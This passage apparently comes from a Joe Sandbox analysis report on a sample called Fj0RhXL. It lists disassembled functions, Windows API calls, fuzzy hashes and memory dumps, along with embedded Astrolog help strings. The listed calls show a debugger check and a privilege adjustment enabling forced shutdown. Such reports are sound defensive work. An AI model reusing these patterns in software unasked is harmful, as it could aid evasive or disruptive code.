Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 930ab83d268af72edc7729f0a593ac727c1ee03b368d56515a4c2cd090a93d08
Instruction ID: 3127e25e52fa1d34b1815579f97168ebbd92b8736124ab69441c08e76e3febcf
Opcode Fuzzy Hash: 930ab83d268af72edc7729f0a593ac727c1ee03b368d56515a4c2cd090a93d08
Instruction Fuzzy Hash: 3B21DFB7931307DFDB14FF29E485A483BA4BB08350F10481BE6898B359EBB09598DF55

Function 02F06925 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02F07A4D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F07A62
UnhandledExceptionFilter.KERNEL32(02F15330), ref: 02F07A6D
GetCurrentProcess.KERNEL32(C0000409), ref: 02F07A89
TerminateProcess.KERNEL32(00000000), ref: 02F07A90

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 29ba7484ef3357e66a9ba10f9696275654ecb4dbec0719366a897dd24180541d
Instruction ID: 7b02a7f3f33be64020ac6ce086ec64d71d5e0bc1fa43fb5a936b78ec2a5a8be4
Opcode Fuzzy Hash: 29ba7484ef3357e66a9ba10f9696275654ecb4dbec0719366a897dd24180541d
Instruction Fuzzy Hash: E12100B4D9224CDFE302DF69F159628FBB1BB083D4FC21859E50897240EBB498A0CF00

Function 6C3D1F75 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C3D5EF7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C3D5F0C
UnhandledExceptionFilter.KERNEL32(6C3FFF84), ref: 6C3D5F17
GetCurrentProcess.KERNEL32(C0000409), ref: 6C3D5F33
TerminateProcess.KERNEL32(00000000), ref: 6C3D5F3A

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1211e4e01e283594b52559e8ff324e5f546600b659c0609db550ede0be54857c
Instruction ID: b6e845b9f4303571179e7c327cd7a44dd7031f927ef3d19db8a08a8c55cfc6c4
Opcode Fuzzy Hash: 1211e4e01e283594b52559e8ff324e5f546600b659c0609db550ede0be54857c
Instruction Fuzzy Hash: F72103B9B122A48FCF52FF98D5486447BB4FB0A308F10441AE90893740E7B69A85CFA5

Function 03D96143 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0

ExitWindowsEx.USER32(00000005,00000000), ref: 03D96151

Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: aee6a1a41078fba264dec1dbcbe4cbebf93fa5b1e2e3813499e0f02e63af0ed6
Instruction ID: 6724146c70f173f02afc9649f95906285a7fbd19bb04daa92d45e78771e2129d
Opcode Fuzzy Hash: aee6a1a41078fba264dec1dbcbe4cbebf93fa5b1e2e3813499e0f02e63af0ed6
Instruction Fuzzy Hash: 64C08C7734030062D224B3B47822779B320DB88732F60062FF74BCC1C00D6364A081B5

Function 03D9611F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0

ExitWindowsEx.USER32(00000006,00000000), ref: 03D9612D

Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: 1afccfdc28d810ee3dfea2c9bd6dd0eec72ed18afa2ba67c8025d3dd38744b39
Instruction ID: 54bc25b06c41635e16197ba26f03dc806fa707974b8300b5a4346b1530318012
Opcode Fuzzy Hash: 1afccfdc28d810ee3dfea2c9bd6dd0eec72ed18afa2ba67c8025d3dd38744b39
Instruction Fuzzy Hash: D6C08C7734030062D224B3B47822779B320DB88732F60062BF64BCC1C00D6364B081B5

Function 03D960FB Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0

ExitWindowsEx.USER32(00000004,00000000), ref: 03D96109

Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID:
API String ID: 681424410-0
Opcode ID: 0871b717c0e2424bcb1e658838a902b73b004de59abf88371fa97b8dd6f0d5a8
Instruction ID: 6c97cf65f97de731ad4c5eb67a5c501bf37a66bd4d19c65a44a24e8dfc17c772
Opcode Fuzzy Hash: 0871b717c0e2424bcb1e658838a902b73b004de59abf88371fa97b8dd6f0d5a8
Instruction Fuzzy Hash: 41C04CB774030466D224B7B57826779B360DB98732F60066BF74BDC1C05D6764A481B9

Function 6C3EFCC6 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0009F931), ref: 6C3EFCDF

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 37a97cd17b47e8cc66b54c26ad5e12337976762c8232d301f831ab38a71a4888
Instruction ID: ee91526e937212463ed736d8739f480c60f1269f12b56dd492ef40b6ac1f0aa7
Opcode Fuzzy Hash: 37a97cd17b47e8cc66b54c26ad5e12337976762c8232d301f831ab38a71a4888
Instruction Fuzzy Hash: 6DD05E7090535087C7249F22D448305BBE07F0A74AFA88A4CCA9D16541C2BEA546CB80

Function 02F14407 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 02F14407

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 504cbaa90e4fd8a6cd86d26f79a8d4847f6587c53892dcaa57282db86be3f51a
Instruction ID: 021329485c6a8e3986dad1e6c3edd900418ee715865889ea286ff778f79df07a
Opcode Fuzzy Hash: 504cbaa90e4fd8a6cd86d26f79a8d4847f6587c53892dcaa57282db86be3f51a
Instruction Fuzzy Hash: 34C08CB5DC22C88EE301DFA4B608305BFA263843D9FE25888D22E89141CB380020CF04

Function 6C35CC33 Relevance: 353.9, APIs: 2, Strings: 200, Instructions: 418COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C35CC56
_sprintf.LIBCMT ref: 6C35CCD0

Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF

Strings

_a[jonOPACDm]: Sort aspects by power, orb, orb difference, 1st planet,, xrefs: 6C35CDA8
_o <file> [..]: Write parameters of current chart to file., xrefs: 6C35D0DC
_zl <long> <lat>: Change the default longitude & latitude., xrefs: 6C35D014
_e: Print all charts together (_v_w_g_a_m_Z_S_l_j_7_L_K_Zd_d_D_B_E)., xrefs: 6C35CF06
_Nz [<rows>]: Display all time changes in time zone of chart city., xrefs: 6C35CFCE
_Ky: Like _K but display a calendar for the entire year., xrefs: 6C35CE5C
_rb <file1> <file2>: Display biorhythm for file1 at time file2., xrefs: 6C35D3AC
_b: Use ephemeris files for more accurate location computations., xrefs: 6C35D1E0
_1 [<objnum>]: Cast chart with specified object on Ascendant., xrefs: 6C35D2EE
_m: Display all object midpoints in sorted zodiac order., xrefs: 6C35CDBC
_r <file1> <file2>: Compute a relationship synastry chart., xrefs: 6C35D37A
_rd <file1> <file2>: Print time span between files' dates., xrefs: 6C35D3A2
_HC: Display names of zodiac signs and houses., xrefs: 6C35CC77
_rc <file1> <file2>: Compute a composite chart., xrefs: 6C35D384
_q <month> <date> <year> <time>: Compute chart with defaults., xrefs: 6C35D06E
_HF, xrefs: 6C35CCC2
_Q: Prompt for more command switches after display finished., xrefs: 6C35CCE0
_R [<obj1> [<obj2> ..]]: Restrict specific bodies from displays., xrefs: 6C35D10E
_qj <day>: Compute chart for time of specified Julian day., xrefs: 6C35D0BE
_N [<rows>]: Lookup chart location as city in atlas., xrefs: 6C35CFBA
_i[2,3,4] <file>: Load chart info into chart slots 2, 3, or 4., xrefs: 6C35D0D2
_qd <month> <date> <year>: Compute chart for noon on date., xrefs: 6C35D078
Switches which affect how a chart is computed:, xrefs: 6C35D1D6
_3: Display objects in their zodiac decan positions., xrefs: 6C35D302
_H: Display this help list., xrefs: 6C35CC63
%s (version %s) command switches:, xrefs: 6C35CC50
_bU: Use inaccurate Matrix formulas for fixed stars only., xrefs: 6C35D212
_zN <city>: Lookup city in atlas and set zone, Daylight, and location., xrefs: 6C35D064
_Z: Display planet locations with respect to the local horizon., xrefs: 6C35CDDA
_z [<zone>]: Change the default time zone (for _d_E_t_q options)., xrefs: 6C35D000
_dp[y]n: Search for progressed aspects in current month/year., xrefs: 6C35CEAC
_i <file>: Compute chart based on info in file., xrefs: 6C35D0C8
_Ap: Orb limits apply to latitude as well as zodiac position., xrefs: 6C35D19A
2nd planet, aspect, 1st position, 2nd position, midpoint., xrefs: 6C35CDB2
_T <month> <day> <year>: Display transits ordered by influence., xrefs: 6C35CF56
_w0 [..]: Like _w but reverse order of objects in houses 4..9., xrefs: 6C35CD44
_V[d,y,Y] [[<day>] <month>] <year>: Like _V for day, year, or 5 years., xrefs: 6C35CF88
_V[..]0: Like _V but don't restrict fast moving objects from graph., xrefs: 6C35CF92
_HF: Display names of astronomical constellations., xrefs: 6C35CC95
_HI: Display meanings of signs, houses, planets, and aspects., xrefs: 6C35CCB3
_z0 [<offset>]: Change the default Daylight time setting., xrefs: 6C35D00A
Switches to access graphics options:, xrefs: 6C35D3F2
_- [<days>]: Cast chart for specified num of days in the past., xrefs: 6C35D35C
_ga: Like _g but indicate applying/separating instead of offset orbs., xrefs: 6C35CD6C
_t <month> <year>: Compute all transits to natal planets in month., xrefs: 6C35CF10
_HO: Display available planets and other celestial objects., xrefs: 6C35CC81
_RT[0,1,C,u,U] [..]: Restrict transiting planets in _t lists., xrefs: 6C35D136
_p0 <month> <day> <year>: Cast solar arc chart for date., xrefs: 6C35D2A8
_od <file>: Output program's current settings to switch file., xrefs: 6C35D0F0
0 = Placidus, 1 = Koch, 2 = Equal, 3 = Campanus, 4 = Meridian,, xrefs: 6C35D226
_a: Display list of all aspects ordered by influence., xrefs: 6C35CD80
Switches which determine the type of chart to display:, xrefs: 6C35CD1C
_Nl [<rows>]: Display nearest cities in atlas to chart location., xrefs: 6C35CFC4
_r[c,m]0 <file1> <file2> <ratio1> <ratio2>: Weighted chart., xrefs: 6C35D398
_bs: Use less accurate Moshier formulas instead of Swiss Ephemeris., xrefs: 6C35D1F4
_Z0: Like _Z but express coordinates relative to polar center., xrefs: 6C35CDE4
_AP: Parallel aspects based on ecliptic not equatorial positions., xrefs: 6C35D1A4
_t[p]d: <month> <day> <year>: Compute transits for a single day., xrefs: 6C35CF2E
_c3: Place in houses using latitude as well as zodiac position., xrefs: 6C35D262
_x <value>: Cast harmonic chart based on specified factor., xrefs: 6C35D2E4
_B: Like _d but graph all aspects occurring in a day., xrefs: 6C35CEC0
_n: Compute chart for this exact moment using current time., xrefs: 6C35CFEC
_r0 <file1> <file2>: Keep the charts separate in comparison., xrefs: 6C35D3B6
_dY <years>: Like _d but search within a number of years., xrefs: 6C35CE84
_a0: Like _a but display aspect summary too., xrefs: 6C35CD8A
_D: Like _d but display aspects by influence instead of time., xrefs: 6C35CEB6
_T[t]p <month> <day> <year>: Print progressions instead of transits., xrefs: 6C35CF6A
_4 [<nest>]: Display objects in their (nested) dwad positions., xrefs: 6C35D30C
_aa: Like _a but indicate applying/separating instead of offset orbs., xrefs: 6C35CD94
_t[p]Y: <year> <years>: Compute transits for a number of years., xrefs: 6C35CF42
_k0: Like _k but only use special characters, not Ansi color., xrefs: 6C35D406
19 = Carter Poli Equatorial, 20 = Sunshine, 21 = Null., xrefs: 6C35D258
_HA: Display available aspects, their angles, and present orbs., xrefs: 6C35CC8B
_V [..]: Like _t but graph all transits occurring during period., xrefs: 6C35CF7E
_g0: Like _g but flag aspect configurations (e.g. Yods) too., xrefs: 6C35CD58
_m0: Like _m but display midpoint summary too., xrefs: 6C35CDC6
_j: Display astrological influences of each object in chart., xrefs: 6C35CE20
_tr <month> <year>: Compute all returns in month for chart., xrefs: 6C35CF24
_C: Include angular and non-angular house cusps in charts., xrefs: 6C35D154
_T[p]n: Display transits ordered by influence for current date., xrefs: 6C35CF74
_7: Display Esoteric Astrology and Ray summary for chart., xrefs: 6C35CE34
_HS: Display information about planets in the solar system., xrefs: 6C35CC9F
_j0: Like _j but include influences of each zodiac sign as well., xrefs: 6C35CE2A
_ap: Like _a but do parallel and contraparallel aspects., xrefs: 6C35CD9E
_zv <elev>: Change the default elevation above sea level., xrefs: 6C35D01E
_os <file>, > <file>: Redirect output of text charts to file., xrefs: 6C35D0FA
_rp[0] <file1> <file2>: Like _r0 but do file1 progr. to file2., xrefs: 6C35D3C0
_w [<rows>]: Display chart in a graphic house wheel format., xrefs: 6C35CD3A
_k: Display text charts using Ansi characters and color., xrefs: 6C35D3FC
_kh: Text charts saved to file use HTML instead of Ansi codes., xrefs: 6C35D410
_RO <obj>: Require object to be present in aspects., xrefs: 6C35D14A
7.10, xrefs: 6C35CC43
_zy <year>: Set only the year of current chart., xrefs: 6C35D050
Compute chart automatically given specified data., xrefs: 6C35D0A0
_B[m,y,Y]: Like _B but for entire month, year, or five years., xrefs: 6C35CECA
_o0 <file> [..]: Like _o but output planet/house positions., xrefs: 6C35D0E6
_zj <name> <place>: Change the default name and place strings., xrefs: 6C35D028
_zd <date>: Set only the day of current chart., xrefs: 6C35D03C
_EY <years>: Display planetary ephemeris for a number of years., xrefs: 6C35CEF2
_qa <month> <date> <year> <time> <zone> <long> <lat>:, xrefs: 6C35D096
_l: Display Gauquelin sectors for each planet in chart., xrefs: 6C35CE0C
_gm: For comparison charts, show midpoints instead of aspects., xrefs: 6C35CD62
_G: Compute houses based on geographic location only., xrefs: 6C35D320
_t[py]n: Compute transits to natal planets for current time now., xrefs: 6C35CF4C
_He: Display all tables together (_Hc_H_Y_HX_HC_HO_HA%s_HS_H7%s)., xrefs: 6C35CCCA
_r[3,4]: Make graphics wheel chart tri-wheel or quad-wheel., xrefs: 6C35D3D4
_dp <month> <year>: Print aspects within progressed chart., xrefs: 6C35CE8E
14 = Whole, 15 = Vedic, 16 = Sripati, 17 = Horizon, 18 = APC,, xrefs: 6C35D24E
_qy <year>: Compute chart for first day of year., xrefs: 6C35D08C
_F <objnum> <sign> <deg>: Force object's position to be value., xrefs: 6C35D33E
_qm <month> <year>: Compute chart for first of month., xrefs: 6C35D082
_b0: Display locations and times to the nearest second., xrefs: 6C35D1EA
_y[b,d,p,t] <file>: Like _r0 but compare to current time now., xrefs: 6C35D3E8
_M0 <1-48> <string>: Define the specified command switch macro., xrefs: 6C35CCFE
_E[]0 <step>: Display ephemeris times for days, months, or years., xrefs: 6C35CEFC
_dpy <year>: Like _dp but search for aspects within entire year., xrefs: 6C35CE98
_+ [<days>]: Cast chart for specified num of days in the future., xrefs: 6C35D352
_M[2-4][0] <strings>: Define macro(s) to run when chart calculated., xrefs: 6C35CD08
_R1 [<obj1> ..]: Like _R0 but unrestrict and show all objects., xrefs: 6C35D122
_ma: Like _m but show aspects from midpoints to planets as well., xrefs: 6C35CDD0
_dm: Like _d but print all aspects for the entire month., xrefs: 6C35CE70
_v0: Like _v but express velocities relative to average speed., xrefs: 6C35CD30
_rt <file1> <file2>: Like _r0 but treat file2 as transiting., xrefs: 6C35D3CA
_Tt <month> <day> <year> <time>: Like _T but specify time too., xrefs: 6C35CF60
Like _qa but takes additional parameter for Daylight offset., xrefs: 6C35D0B4
_s [..]: Compute a sidereal instead of standard tropical chart., xrefs: 6C35D26C
_f: Display houses as sign positions (flip them)., xrefs: 6C35D316
_h [<objnum>]: Compute positions centered on specified object., xrefs: 6C35D294
_u: Include transneptunian/Uranian bodies in charts., xrefs: 6C35D15E
_A <0-18>: Specify the number of aspects to use in charts., xrefs: 6C35D186
_tp <month> <year>: Compute progressions to natal in month for chart., xrefs: 6C35CF1A
Astrolog, xrefs: 6C35CC48
_c <value>: Select a different system of house division., xrefs: 6C35D21C
_Y: Display help list of less commonly used command switches., xrefs: 6C35CD12
_U: Include locations of fixed background stars in charts., xrefs: 6C35D168
_d [<step>]: Print all aspects and changes occurring in a day., xrefs: 6C35CE66
_pC <days>: Set factor to use when progressing cusps (default 1.0)., xrefs: 6C35D2DA
_B0: Like _B but don't restrict fast moving objects from graph., xrefs: 6C35CED4
_zi <name> <place>: Set name and place strings of current chart., xrefs: 6C35D05A
_Ad <planet> <orb>: Specify orb addition given to a planet., xrefs: 6C35D1C2
_Ey: Display planetary ephemeris for the entire year., xrefs: 6C35CEE8
_Fm <objnum> <obj1> <obj2>: Force object's position to midpoint., xrefs: 6C35D348
_zt <time>: Set only the time of current chart., xrefs: 6C35D032
_2 [<objnum>]: Cast chart with specified object on Midheaven., xrefs: 6C35D2F8
_I [<columns>]: Print interpretation of selected charts., xrefs: 6C35CFD8
_U[z,l,n,b,d,v]: Sort stars by zodiac position, latitude, name,, xrefs: 6C35D172
_Ao <aspect> <orb>: Specify maximum orb for an aspect., xrefs: 6C35D1AE
_P[z,n,f]: Order parts by position, name, or formula., xrefs: 6C35CFB0
_v: Display list of object positions (chosen by default)., xrefs: 6C35CD26
_R0 [<obj1> ..]: Like _R but restrict everything first., xrefs: 6C35D118
_M <1-48>: Run the specified command switch macro., xrefs: 6C35CCF4
Switches for relationship and comparison charts:, xrefs: 6C35D370
9 = Alcabitius, 10 = Krusinski, 11 = Equal (Midheaven),, xrefs: 6C35D23A
_sr0: Like _sr but only display declinations instead of latitudes., xrefs: 6C35D280
_Zd[m,y,Y] [<years>]: Like _Zd but for entire month, year, or years., xrefs: 6C35CDF8
_rm <file1> <file2>: Compute a time space midpoint chart., xrefs: 6C35D38E
_R[C,u,U]: Restrict all minor cusps, all Uranians, or stars., xrefs: 6C35D12C
_+[m,y] [<value>]: Cast chart for num of months/years in future., xrefs: 6C35D366
_A3: Aspects calculated by latitude combined with zodiac position., xrefs: 6C35D190
_pd <days>: Set num of days to progress / day (default 365.24219)., xrefs: 6C35D2D0
brightness, distance, or zodiac position velocity., xrefs: 6C35D17C
_dpY <year> <years>: Like _dp but search within number of years., xrefs: 6C35CEA2
_S: Display x,y,z coordinate positions of planets in space., xrefs: 6C35CE02
_bp: Use less accurate Placalc ephemeris instead of Swiss Ephemeris., xrefs: 6C35D1FE
_L [<step>]: Display astro-graph locations of planetary angles., xrefs: 6C35CE3E
_Aa <aspect> <angle>: Change the actual angle of an aspect., xrefs: 6C35D1CC
_J: Display wheel charts in Vedic format., xrefs: 6C35D32A
5 = Regiomontanus, 6 = Porphyry, 7 = Morinus, 8 = Topocentric,, xrefs: 6C35D230
_Hc: Display program credits and copyrights., xrefs: 6C35CC6D
_l0: Like _l but approximate sectors using Placidus cusps., xrefs: 6C35CE16
_p[0]n: Cast progressed chart based on current date now., xrefs: 6C35D2C6
_RA [<asp1> ..]: Restrict specific aspects from displays., xrefs: 6C35D140
_Q0: Like _Q but prompt for additional switches on startup., xrefs: 6C35CCEA
_bm: Use inaccurate Matrix formulas when ephemeris unavailable., xrefs: 6C35D208
_g: Display aspect and midpoint grid among planets., xrefs: 6C35CD4E
_HI, xrefs: 6C35CCBD
_n[d,m,y]: Compute chart for start of current day, month, year., xrefs: 6C35CFF6
_Zd: Search day for object local rising and setting times., xrefs: 6C35CDEE
_qb <month> <date> <year> <time> <daylight> <zone> <long> <lat>:, xrefs: 6C35D0AA
_P [<parts>]: Display list of Arabic parts and their positions., xrefs: 6C35CF9C
12 = Pullen Sinusoidal Ratio, 13 = Pullen Sinusoidal Delta,, xrefs: 6C35D244
_p1 <month> <day> <year>: Like _p but with solar arc cusps only., xrefs: 6C35D2B2
Switches which affect what information is used in a chart:, xrefs: 6C35D104
_sr: Compute right ascension locations relative to equator., xrefs: 6C35D276
_t[p]y: <year>: Compute transits/progressions for entire year., xrefs: 6C35CF38
Switches which affect how the chart parameters are obtained:, xrefs: 6C35CFE2
_Am <planet> <orb>: Specify maximum orb allowed to a planet., xrefs: 6C35D1B8
_dy: Like _d but print all aspects for the entire year., xrefs: 6C35CE7A
_gp: Like _g but generate parallel and contraparallel aspects., xrefs: 6C35CD76
_E: Display planetary ephemeris for given month., xrefs: 6C35CEDE
_P0 [<parts>]: Like _P but display formulas with terms reversed., xrefs: 6C35CFA6
_p[0]t <month> <day> <year> <time>: Like _p but specify time too., xrefs: 6C35D2BC
_9: Display objects in their zodiac navamsa positions., xrefs: 6C35D334
_K: Display a calendar for given month., xrefs: 6C35CE52
_p <month> <day> <year>: Cast secondary progressed chart for date., xrefs: 6C35D29E
_H7: Display information about the seven esoteric Rays., xrefs: 6C35CCA9
_L0 [..]: Like _L but display list of latitude crossings too., xrefs: 6C35CE48
_s[z,h,d]: Display locations as in zodiac, hours/minutes, or degrees., xrefs: 6C35D28A
_y <file>: Display current house transits for particular chart., xrefs: 6C35D3DE
_zm <month>: Set only the month of current chart., xrefs: 6C35D046

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$__output_l
